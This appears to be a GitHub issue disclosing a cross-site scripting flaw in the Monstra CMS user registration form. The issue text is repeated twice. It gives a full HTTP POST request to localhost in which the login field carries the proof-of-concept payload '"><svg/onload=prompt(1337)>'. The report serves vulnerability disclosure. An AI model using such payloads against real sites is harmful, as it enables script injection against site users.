Open nikhil1232 opened 6 years ago
XSS in registration Form Below is the post request that is causing the pop up..here all the fields are vulnerable
POST /monstra/users/registration HTTP/1.1 Host: localhost Cache-Control: no-cache Referer: http://localhost/monstra/users/registration Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 Accept-Language: en-us,en;q=0.5 Cookie: PHPSESSID=xxxx; login_attempts=i%3A5%3B Accept-Encoding: gzip, deflate Content-Length: 142 Content-Type: application/x-www-form-urlencoded
csrf=803ee6c7fc318793f6378e0a7e22257ff8a7ea48&login="><svg/onload=prompt(1337)>&password=&email=&answer=®ister=Register
XSS in registration Form Below is the post request that is causing the pop up..here all the fields are vulnerable
POST /monstra/users/registration HTTP/1.1 Host: localhost Cache-Control: no-cache Referer: http://localhost/monstra/users/registration Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 Accept-Language: en-us,en;q=0.5 Cookie: PHPSESSID=xxxx; login_attempts=i%3A5%3B Accept-Encoding: gzip, deflate Content-Length: 142 Content-Type: application/x-www-form-urlencoded
csrf=803ee6c7fc318793f6378e0a7e22257ff8a7ea48&login="><svg/onload=prompt(1337)>&password=&email=&answer=®ister=Register